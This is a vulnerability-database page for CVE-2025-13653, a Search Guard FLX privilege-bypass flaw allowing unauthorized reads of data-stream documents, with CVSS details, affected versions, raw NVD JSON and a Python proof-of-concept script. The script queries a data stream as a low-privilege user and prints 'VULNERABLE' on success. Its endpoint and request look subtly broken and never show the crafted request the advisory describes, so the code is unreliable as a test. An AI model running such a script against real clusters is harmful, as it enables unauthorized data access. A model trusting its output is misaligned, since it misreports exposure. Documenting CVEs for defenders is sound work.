Security Vulnerability Report
中文
CVE-2025-13653 CVSS 4.3 MEDIUM

CVE-2025-13653

Published: 2025-12-01 18:16:03
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

In Search Guard FLX versions from 3.1.0 up to 4.0.0 with enterprise modules being disabled, there exists an issue which allows authenticated users to use specially crafted requests to read documents from data streams without having the respective privileges.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Search Guard FLX 3.1.0
Search Guard FLX 3.2.0
Search Guard FLX 3.3.0
Search Guard FLX 3.4.0
Search Guard FLX 3.5.0
Search Guard FLX 4.0.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-13653 PoC - Search Guard FLX Privilege Bypass # Affected versions: Search Guard FLX 3.1.0 - 4.0.0 (with enterprise modules disabled) # This PoC demonstrates unauthorized data stream document access import requests from requests.auth import HTTPBasicAuth TARGET = "https://<elasticsearch-host>:9200" USERNAME = "low_privilege_user" PASSWORD = "user_password" DATA_STREAM_NAME = "sensitive-data-stream" headers = { "Content-Type": "application/json", "es-security-runas-user": USERNAME } auth = HTTPBasicAuth(USERNAME, PASSWORD) print("[*] Testing CVE-2025-13653 - Search Guard FLX Privilege Bypass") print(f"[*] Target: {TARGET}") print(f"[*] User: {USERNAME}") print(f"[*] Data Stream: {DATA_STREAM_NAME}") # Attempt to read documents from protected data stream endpoint = f"{TARGET}/_data_stream/{DATA_STREAM_NAME}/_search" try: response = requests.get(endpoint, headers=headers, auth=auth, verify=False, timeout=10) print(f"\n[+] Status Code: {response.status_code}") if response.status_code == 200: data = response.json() if "hits" in data: print("[!] VULNERABLE: Successfully accessed data stream without proper privileges") print(f"[!] Documents retrieved: {len(data['hits']['hits'])}") else: print("[*] Response received but format unexpected") elif response.status_code == 403: print("[+] SECURE: Access denied (expected behavior)") else: print(f"[*] Unexpected status: {response.status_code}") except requests.exceptions.RequestException as e: print(f"[-] Error: {e}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-13653", "sourceIdentifier": "[email protected]", "published": "2025-12-01T18:16:02.707", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "In Search Guard FLX versions from 3.1.0 up to 4.0.0 with enterprise modules being disabled, there exists an issue which allows authenticated users to use specially crafted requests to read documents from data streams without having the respective privileges."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-200"}, {"lang": "en", "value": "CWE-863"}]}], "references": [{"url": "https://docs.search-guard.com/latest/changelog-searchguard-flx-4_0_1", "source": "[email protected]"}, {"url": "https://search-guard.com/cve-advisory/", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.